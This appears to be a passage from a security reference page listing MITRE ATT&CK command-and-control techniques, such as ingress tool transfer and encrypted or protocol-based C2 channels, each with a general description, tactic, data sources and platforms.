Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre